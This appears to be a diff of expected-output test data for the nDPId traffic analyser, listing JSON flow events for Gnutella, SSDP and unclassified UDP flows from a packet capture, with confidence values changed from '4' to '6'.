-00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":101162,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":101837,"flow_last_seen":289958,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287340,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287572,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2838,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95716,"flow_last_seen":287440,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2001,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287579,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2031,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287857,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2839,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":280014,"flow_last_seen":283055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57552,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":101162,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":101837,"flow_last_seen":289958,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287340,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287572,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2838,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95716,"flow_last_seen":287440,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2001,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287579,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2031,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287857,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2839,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287425,"flow_last_seen":287425,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.148.100.237","src_port":28681,"dst_port":23459,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287425,"flow_last_seen":287425,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.148.100.237","src_port":28681,"dst_port":23459,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287428,"flow_last_seen":287428,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":28681,"dst_port":13060,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3142,8 +3142,8 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287650,"flow_last_seen":287650,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.206.27.26","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.47.223.27","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.47.223.27","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":101162,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":168555,"flow_last_seen":287464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2374,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":101162,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":168555,"flow_last_seen":287464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2374,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00581{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":251765,"flow_last_seen":287535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00566{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":251765,"flow_last_seen":287535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":28681,"dst_port":23458,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287309,"flow_last_seen":287309,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.173.230.98","src_port":28681,"dst_port":19004,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3160,7 +3160,7 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":28681,"dst_port":64577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":243619,"flow_last_seen":287621,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.84.134.136","src_port":28681,"dst_port":21407,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":243619,"flow_last_seen":287621,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.84.134.136","src_port":28681,"dst_port":21407,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":90005,"flow_last_seen":287355,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4793,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":90005,"flow_last_seen":287355,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4793,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.25.47","src_port":28681,"dst_port":21293,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.25.47","src_port":28681,"dst_port":21293,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287511,"flow_last_seen":287511,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":28681,"dst_port":21293,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3175,7 +3175,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287441,"flow_last_seen":287441,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":28681,"dst_port":52274,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287600,"flow_last_seen":287600,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.118.77","src_port":28681,"dst_port":62191,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 